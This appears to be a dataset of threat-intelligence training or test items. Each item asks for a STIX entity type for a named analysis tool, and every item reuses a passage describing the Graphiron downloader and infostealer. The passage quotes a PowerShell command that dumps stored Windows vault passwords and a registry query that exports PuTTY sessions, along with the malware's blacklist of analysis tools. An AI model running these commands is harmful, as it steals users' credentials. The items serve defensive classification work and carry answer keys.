"input": "### Entity:\nHookExplorer\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nHTTPDebuggerSVC\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nprocesshacker\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nWinDump\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nidag\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nFiddler\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\ntshark\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
